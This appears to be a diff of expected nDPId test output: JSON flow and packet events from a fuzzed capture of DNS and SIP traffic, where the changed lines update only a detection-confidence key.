00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":1120470234792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470234792,"pkt":"ADBUADRWAODtAW69CABFAABIasYAAIARTIvAqAECwKgBAQrMADUANEn93\/sBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470236795,"flow_last_seen":1120470236795,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470236795,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1120470236795,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470236795,"pkt":"ADBUADRWAODtAW69CABFAABIaskAAIARTIjAqAECqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":1120470238798,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470238798,"pkt":"ADBUADRWAODtAW69CABFAABIasoAAIARTIfAqAECwKgBAQrMADUANEn93\/sBAAABAAAAAAAABF9zaXAEX3VkcANzDXAJY0liZXJjaXR5AmRrAAAhAAE="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":331,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470233796,"flow_last_seen":1120470238798,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470238798,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.s?p.cibercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00888{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470233796,"flow_last_seen":1120470242804,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":170,"num_answers":254,"reply_code":10,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":331,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470233796,"flow_last_seen":1120470238798,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470238798,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.s?p.cibercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00888{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470233796,"flow_last_seen":1120470242804,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":170,"num_answers":254,"reply_code":10,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049185,"flow_last_seen":1120470049185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"67.168.1.1","src_port":2747,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470032178,"flow_last_seen":1120470041184,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470049190,"flow_last_seen":1120470058198,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120470049696,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120470049696,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00569{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469635127,"flow_last_seen":1120469697466,"flow_idle_time":620000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1120470250805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470250805,"pkt":"ADAlcwBWAODtAW69CABFAABEaswAAIARTInAqAFuwKgBAQrNADUAMLv0aP0AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470250807,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1120470250807,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470250807,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cs0AR55waP2AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyhGFycGEAAAwAAcAMAAwAJXMAJxAAawlsb2NhbGhvc3QA"} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470250807,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470250807,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250906,"flow_last_seen":1120470250906,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470250906,"l3_proto":"ip4","src_ip":"192.168.1.172","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1120470250906,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470250906,"pkt":"ADBUADRWAODtAW69CABFAABIas4AAIARTIPAqAGswKgBAQrOADUANK35e\/0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250906,"flow_last_seen":1120470250906,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470250906,"l3_proto":"ip4","src_ip":"192.168.1.172","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250906,"flow_last_seen":1120470250906,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470250906,"l3_proto":"ip4","src_ip":"192.168.1.172","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470251907,"flow_last_seen":1120470251907,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470251907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1120470251907,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470251907,"pkt":"ADBUADRWAODtAW69CABFAABIassAAIARTILAqAECwKgBAQrOADUANK35e\/0BAAABAAAAJXMABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470251907,"flow_last_seen":1120470251907,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470251907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470251907,"flow_last_seen":1120470251907,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470251907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1120470253909,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470253909,"pkt":"ADBUADRWAODtAW69CABFAABIatAAAIARTIHAqAECwKgBAQrOADUANK35e\/0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZTBjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":338,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470251907,"flow_last_seen":1120470253909,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470253909,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybe0city.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":338,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470251907,"flow_last_seen":1120470253909,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470253909,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybe0city.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":339,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470255912} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":339,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470253909,"pkt":"ADBUAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1120470259918,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470259918,"pkt":"ADBUADRWAODtAW69CABFAABIatkAAIQRTHjAqAECwKgBATnOADUANK35e\/0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhABE="} 